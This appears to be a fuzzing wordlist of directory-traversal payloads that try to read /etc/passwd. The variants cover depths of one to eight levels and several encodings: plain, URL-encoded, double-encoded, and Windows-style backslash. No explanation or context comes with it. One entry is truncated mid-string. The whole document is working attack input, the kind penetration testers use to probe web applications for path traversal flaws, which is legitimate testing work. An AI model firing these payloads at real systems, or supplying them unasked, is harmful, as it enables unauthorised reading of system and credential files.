../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd    
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
..%2fetc%2fpasswd
..%2f..%2fetc%2fpasswd
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
%2e%2e/etc/passwd
%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
..%252fetc%252fpasswd
..%252f..%252fetc%252fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
%252e%252e/etc/passwd
%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd
%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
..\etc\passwd
..\..\etc\passwd
..\..\..\etc\passwd
..\..\..\..\etc\passwd
..\..\..\..\..\etc\passwd
..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\etc\passwd
..%255cetc%255cpasswd
..%255c..%255cetc%255cpasswd
..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255cetc%255cpasswd
..%5c..%5cetc%5cpasswd
..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%5cpasswd
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc%
%2e%2e\etc\passwd
%2e%2e\%2e%2e\etc\passwd
%2e%2e\%2e%2e\%2e%2e\etc\passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\etc\passwd
%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc%5cpasswd
%252e%252e\etc\passwd
%252e%252e\%252e%252e\etc\passwd
%252e%252e\%252e%252e\%252e%252e\etc\passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\etc\passwd